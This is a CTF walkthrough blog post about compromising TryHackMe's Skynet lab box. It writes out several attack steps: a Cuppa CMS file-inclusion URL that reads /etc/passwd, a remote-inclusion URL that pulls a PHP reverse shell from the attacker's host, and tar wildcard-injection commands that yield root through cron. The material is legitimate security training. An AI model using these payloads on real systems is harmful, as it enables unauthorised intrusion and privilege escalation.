CTF Walkthroughs, TryHackMe

TryHackMe – Skynet Walkthrough

April 25, 2021 | by Stefano Lanaro

Introduction

This was an easy Linux box that involved accessing an open SMB share containing a list of credentials that could be used to bruteforce a SquirrelMail web application, finding SMB credentials on the application to access a new share which revealed a second web application, and exploiting a remote file inclusion vulnerability in Cuppa CMS to gain remote access. Privilege escalation was possible due to a misconfigured cron job running as root and using a wildcard with the tar command.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
  • -oA to save the output in all formats available

The initial Nmap scan has revealed that port 22, 80, 110, 139, 143 and 445 are open, so the next logical step is to start enumerating the HTTP and SMB services.

Enumerating SMB

Using the SMBClient tool to list the open shares on the host:

Connecting to the “anonymous” share, this contains a text file and a “logs” folder, containing three log files. Downloading all of the files locally to furhter examine them:

The “attention.txt” file contains a note that mentions a password change in the organization, whereas the logs contain what looks like a word list of some sort, potentially from an authentication log:

Enumerating HTTP

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

The scan has revealed an interesting “squirrelmail” entry. Upon visiting this page, a login page for the SquirrelMail 1.4.23 web application is displayed. SquirrelMail is a web application that aims to provide both a web-based email client and a proxy server for the IMAP protocol.

Common credentials such as admin/admin were unsuccessful unfortunately..

Brute-forcing SquirrelMail

The wordlist found earlier could contain a valid password to authenticate into SquirrelMaill. Using Burp Suite to intercept the authentication request:

Forwarding the request to Intruder and setting the “secretkey” parameter for the brute-force, using milesdyson as username (the user who left the note in the SMB share):

Selecting runtime file as a payload type and loading the log file found earlier in the anonymous SMB share:

It appears that when using a certain password, the response length differs from the failed login request:

Authenticating into SquirrelMail using the password found by Burp Suite intruder:

It looks like the site contains three email records, one of which has a subject of “Samba Password reset”:

When opening the email, it appears to contain SMB credentials

Enumerating SMB Again

The milesdyson user is able to log into the milesdyson share found earlier, using the credentials that were in the email record above:

When listing the contents of the share, there seems to be a “notes” folder, which contains a large number of Markdown files. Downloading the “important.txt” file:

It appears to contain a to-do list, and the first point in the list mentions the “45kra24zxs28v3yd” directory to a content management system:

When accessing the folder, the following page is displayed, indicating the CMS indeed exists:

Exploiting Remote File Inclusion in Cuppa CMS

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

Gobuster has revealed the /administrator directory, when accessing it, a Cuppa CMS login page is displayed:

When using the SearchSploit tool to identify known vulnerabilities in Cuppa CMS, it appears to be affected by a local and remote file inclusion vulnerability. This means files hosted on the web server may be accessible to external users, and it may be possible to include remote files, potentially executing malicious code. Mirroring the exploit:

The exploit mentions the following:

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

When using the following payload, the /etc/passwd file that is present on the web server can be accessed:

http://10.10.109.134/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Copying the Laudanum PHP reverse shell to the current working directory and modifying the IP address and port accordingly:

Setting up a Python web server to host the PHP reverse shell:

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Modifying the payload to instead access the PHP reverse shell hosted on the Kali local machine:

http://10.10.109.134/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.228.20/php-reverse-shell.php

Upon navigating to the PHP reverse shell hosted remotely, the code is executed in the context of the www-data user, therefore granting a reverse shell:

The following steps can be done to obtain an interactive shell:

  • Running “python -c ‘import pty; pty.spawn(“/bin/sh”)’” on the victim host
  • Hitting CTRL+Z to background the process and go back to our host
  • Running “stty raw -echo” on our host
  • Hitting “fg + ENTER” to go back to our reverse shell

Privilege Escalation

The home directory of the milesdyson user seems to contain a “backup” folder, which has a BASH script:

It apperas the script is simply using the tar command-line tool to archive the contents of the web application stored in /var/www/html and place the backups in the backup folder.

Upon reviewing cron jobs stored in the /etc/crontab file, it appears this script is being executed as root every minute:

Upon consulting GTFOBins, it appears tar can be exploited when running as sudo. Tar has an argument called –checkpoint, which allows to display a “progress” message every time X number of files have been archived. This can be used in concatenation with the –checkpoint-action flag, which allows to execute an action, in form of a binary or script, whenever a checkpoint is reached.

Since the wildcard used in the script will execute a given command against all files and folders in the /var/www/html directory, this can be exploited by adding a –checkpoint=1 file (to enable the checkpoint function) and a –checkpoint-action=exec=/tmp/stef.sh file (to specify the action to perform) which will be effectively treated as arguments when tar comes across them. More details on the exploit available below:

Creating BASH script which will create SUID binary of bash, naming it stef.sh:

Executing commands to create two files which are actually arguments for the tar command line utility (used in the GTFOBins example above):

touch "/var/www/html/--checkpoint-action=exec=sh stef.sh"
touch "/var/www/html/--checkpoint=1"

After a minute or so, the cron job has run and has created the “stef” SUID copy of BASH. After executing it with the -p flag, which allows to execute binaries as the owner of it, this grants root access to the host:

Conclusion

This was a very interesting box and despite the fact that the actual exploitation didn’t require a lot of knowledge, it was very real life-based, presenting issues that could be very well be found on an actual network, such as open SMB shares containing sensitive information, emails containing credentials and unpatched vulnerable software leading to remote code execution.